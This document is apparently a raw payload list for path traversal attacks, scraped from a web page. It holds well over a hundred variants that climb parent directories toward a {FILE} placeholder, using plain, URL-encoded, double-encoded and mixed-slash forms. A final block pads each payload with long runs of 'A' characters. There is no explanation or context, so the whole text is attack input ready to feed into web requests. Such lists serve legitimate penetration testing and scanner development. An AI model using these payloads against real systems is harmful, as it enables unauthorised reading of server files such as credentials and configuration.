%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
